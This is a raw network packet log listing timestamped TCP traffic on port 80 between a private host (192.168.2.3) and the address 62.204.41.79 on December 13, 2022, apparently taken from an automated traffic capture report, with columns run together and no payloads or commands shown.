                                              Dec 13, 2022 20:09:14.225528002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.225850105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.226037979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.226226091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.226396084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.226572990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.226859093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227076054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227236032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227413893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227598906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227755070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.227945089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228120089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228303909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228485107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228612900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.228637934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.228652954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.228665113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228893995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.228925943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.228974104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229166985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.229356050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.229382992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229494095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229509115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229589939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.229643106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229727030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229784966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.229850054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229923010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.229996920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.230170965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.230195045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230214119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230262995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230278969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230422974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.230448008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230498075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230635881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.230688095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230812073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.230854034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.230904102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231008053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231008053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.231093884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231199980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.231293917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231324911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231429100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.231573105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231589079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231632948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231686115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.231708050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231841087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.231997967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.232012987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232047081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232151985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232220888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.232326984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232419968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.232470989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232611895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.232613087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232767105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232815981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.232835054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.232928991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233045101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.233047962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233097076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233247042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.233300924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233352900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233427048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233493090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.233655930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233680010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.233731985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.233906984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.233932018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.234282970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.234307051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.236591101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.237025976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.237075090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237101078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237114906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237375021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237420082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.237623930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237639904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.237705946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.237930059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.237940073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238049984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238079071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238105059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238120079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238178968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238253117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238346100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238373995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238449097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238451958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238547087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238625050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238641977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238728046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238744020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238903999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.238939047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.238976955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239104033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239142895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.239156961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.239284039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239486933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239634037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.239696980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.239713907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239816904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.239970922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.239974022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240060091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240175962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240233898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.240340948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240428925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.240539074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240612030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240667105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.240809917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.240935087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.240983963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.241137981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.241161108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.241427898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.241579056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.241693020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.241915941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242057085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242259026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242291927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242544889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242652893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.242672920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242799997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.242860079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.242940903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243016958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243081093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243133068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243220091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243345976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243427038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243452072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243495941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243622065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243745089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.243788958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243853092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.243886948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244048119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244102001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.244129896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.244210958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244335890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244380951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.244477987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244498014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.244615078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244664907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.244754076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.244877100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245003939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245129108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245254040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245425940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245656967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245872974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.245992899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.247190952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.247231007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.247258902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.247375011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.247500896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248200893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248347998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248364925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248594046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.248629093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248645067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248728037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248795986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.248936892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.248999119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.249102116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.249115944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.249196053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.249403000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.249609947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.249810934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.250030041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.250240088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.250462055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.250649929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.250864029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251049042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251243114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251422882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251612902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251802921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.251848936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.251867056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.251982927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252170086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252324104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252454996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252470970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252484083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252496958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252504110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252547026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252686977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252698898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252774954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252826929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.252904892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.252996922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253060102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253179073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253268003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253346920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253462076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253479958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253578901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253640890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253652096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253782034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.253828049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.253911018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254014015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254050016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.254137039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254257917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.254286051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254446983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.254489899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254537106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.254722118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.255424976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.255539894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.255743027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.255870104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.256012917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.256131887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.256345034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.256443024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.256618023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261106968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261135101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261507988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261575937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261670113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261686087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261699915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261858940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.261934996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262139082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262214899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262340069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262468100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262662888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262695074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262808084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.262963057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263098955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263216972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263336897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263542891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263714075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263818979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.263981104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264055014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264133930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264508963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264703989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264738083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264775991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.264873981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265062094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265208960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265244961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265688896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265707970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265723944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265836954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.265950918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266057014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266161919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266298056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266486883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266576052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266738892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.266895056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267064095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267146111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267258883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267416954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267582893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.267613888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270178080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270243883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270932913 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270953894 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270972967 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.270992041 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271012068 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271033049 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271054029 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271064997 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271085024 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271099091 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271106958 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271127939 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271152973 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271182060 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271197081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271214962 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271231890 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271231890 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271250963 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271262884 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271271944 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271306038 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271307945 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271327019 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271331072 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271357059 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271362066 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271390915 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271409035 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271411896 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271433115 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271446943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271454096 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271466017 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.271477938 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.271486044 CET804973562.204.41.79192.168.2.3
